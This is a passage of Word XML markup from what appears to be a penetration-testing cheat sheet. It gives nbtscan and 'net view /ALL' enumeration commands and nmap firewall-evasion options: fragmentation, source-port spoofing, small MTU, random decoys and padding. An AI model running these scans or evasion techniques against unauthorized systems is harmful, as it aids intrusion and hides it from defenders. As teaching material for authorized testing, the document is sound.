        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E823E9" w14:textId="6C0A19C9" w:rsidR="006E4E41" w:rsidRDefault="006E4E41" w:rsidP="006E4E41">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Port, Service and Web Page Scanning: </w:t>
      </w:r>
      <w:r w:rsidR="003C01E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nbtscan</w:t>
      </w:r>
      <w:r w:rsidR="00F57EA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | Net</w:t>
      </w:r>
      <w:r w:rsidR="00847CE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F57EA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>view</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="946"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2392"/>
        <w:gridCol w:w="8024"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C2FDC" w14:paraId="2F323567" w14:textId="77777777" w:rsidTr="005C2FDC">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6B4A2475" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t>43.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="16659CEF" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRPr="00F4574C" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nbtscan</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(n</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>btscan</w:t>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is already installed on Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="53423D30" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRPr="00F4574C" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t>The first thing to enumerate is usually the NetBIOS (if the target is windows and 139/tcp appears to be open), to do so, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00925981">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nbtscan</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00925981">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-v -h </w:t>
            </w:r>
            <w:r w:rsidRPr="00925981">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00925981">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-v</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Verbose mode</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00925981">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-h</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Human readable format</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C2FDC" w14:paraId="13262C33" w14:textId="77777777" w:rsidTr="005C2FDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="34377787" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t>43.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4EF137FB" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>net view</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00847CE6">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(net view is a Windows only command)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="16FD6C08" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t xml:space="preserve">Net view is a Windows command line utility that displays a list of </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>computer</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in a specified workgroup or shared resources available on a specified computer:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B44B41">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">net view </w:t>
            </w:r>
            <w:r w:rsidRPr="00B44B41">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">\\TARGET.IP.ADD.RESS </w:t>
            </w:r>
            <w:r w:rsidRPr="00B44B41">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>/ALL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
              <w:t>/ALL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B44B41">
              <w:t>Will also reveal hidden shares</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>/domain</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>All shares in the domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C2FDC" w14:paraId="2BDA040C" w14:textId="77777777" w:rsidTr="005C2FDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3A7A6A55" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="054E1580" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1F9B8214" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRPr="000C65EE" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AA342CB" w14:textId="77777777" w:rsidR="00B6617D" w:rsidRDefault="00B6617D"/>
    <w:p w14:paraId="447397A4" w14:textId="77777777" w:rsidR="00B6617D" w:rsidRDefault="00B6617D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="177ED9F9" w14:textId="77BB365A" w:rsidR="00B6617D" w:rsidRDefault="00B6617D" w:rsidP="00B6617D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Port, Service and Web Page Scanning: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Firewall Evasion Techniques</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="961"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2392"/>
        <w:gridCol w:w="8024"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C2FDC" w14:paraId="1EB20EA0" w14:textId="77777777" w:rsidTr="005C2FDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="380212C2" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t>44.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="42966EAC" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRPr="00F4574C" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00F4574C">
              <w:t>nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2020A04B" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRPr="00F4574C" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t xml:space="preserve">We can use the </w:t>
            </w:r>
            <w:r w:rsidRPr="00684ECE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-f </w:t>
            </w:r>
            <w:r>
              <w:t>flag while using nmap to fragment the packets into smaller pieces (fragments) as a way to possibly bypass any firewall filtering.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C2FDC" w14:paraId="6676D666" w14:textId="77777777" w:rsidTr="005C2FDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2FE7DE80" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t>44.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6D4FAE30" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRPr="00F4574C" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="24DA518A" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRPr="00F4574C" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t xml:space="preserve">We can use </w:t>
            </w:r>
            <w:r w:rsidRPr="00684ECE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-g </w:t>
            </w:r>
            <w:r w:rsidRPr="00684ECE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to perform source port manipulation.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00684ECE">
              <w:t>Source port manipulation refers to manipulating actual port numbers with common port numbers to evade IDS/firewall: this is useful when the firewall is configured to allow packets from well-known ports like HTTP, DNS, FTP, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C2FDC" w14:paraId="5AF04375" w14:textId="77777777" w:rsidTr="005C2FDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="780BFAE4" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t>44.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7EA4F5FC" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRPr="00F4574C" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="197DB9D0" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t xml:space="preserve">We can also try using </w:t>
            </w:r>
            <w:r w:rsidRPr="000634B2">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-mtu </w:t>
            </w:r>
            <w:r w:rsidRPr="000634B2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to specifiy the number of maximum transmission units, in bytes of packets.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="074E1E62" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRPr="000634B2" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r w:rsidRPr="000634B2">
              <w:t>Using MTU, smaller packets are transmitted instead of sending one complete packet at a time. This technique evades the filtering and detection mechanism enabled in the target machine.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C2FDC" w14:paraId="2747EB5A" w14:textId="77777777" w:rsidTr="005C2FDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4E58BFA3" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t>44.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3DBCABC7" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRPr="00F4574C" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0A16C9C9" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t xml:space="preserve">We can try using </w:t>
            </w:r>
            <w:r w:rsidRPr="004140E7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-D </w:t>
            </w:r>
            <w:r>
              <w:t>to perform a decoy scan.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">And, use </w:t>
            </w:r>
            <w:r w:rsidRPr="004140E7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>RND:</w:t>
            </w:r>
            <w:r w:rsidRPr="004140E7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="004140E7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>generates random and non-reserved IP addresses.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="004140E7">
              <w:t>The IP address decoy technique refers to generating or manually specifying IP addresses of the decoys to evade IDS/firewall. This technique makes it difficult for the IDS/firewall to determine which IP address was actually scanning the network and which IP addresses were decoys. By using this command, Nmap automatically generates a random number of decoys for the scan and randomly positions the real IP address between the decoy IP addresses.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Here is an example of them in use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004140E7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:r w:rsidRPr="004140E7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004140E7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-D RND:</w:t>
            </w:r>
            <w:r w:rsidRPr="004140E7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004140E7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>192.168.28.49</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C2FDC" w14:paraId="72642C94" w14:textId="77777777" w:rsidTr="005C2FDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0D1CB28A" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t>44.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="20FA1F9E" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRPr="00F4574C" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="369BAED1" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="005C2FDC">
            <w:r>
              <w:t>There are other things that may work, these involve custom packets, including:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="003E4AF7">
              <w:t xml:space="preserve">Nmap uses </w:t>
            </w:r>
            <w:r w:rsidRPr="003E4AF7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--randomize-hosts </w:t>
            </w:r>
            <w:r w:rsidRPr="003E4AF7">
              <w:t>to scan the number of hosts in the target network in random order to scan the intended target that is beyond the firewall.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="003E4AF7">
              <w:t xml:space="preserve">Nmap uses </w:t>
            </w:r>
            <w:r w:rsidRPr="003E4AF7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--data-length</w:t>
            </w:r>
            <w:r w:rsidRPr="003E4AF7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003E4AF7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003E4AF7">
              <w:t>to append the number of random data bytes to most of the packets sent without any protocol-specific payloads.</w:t>
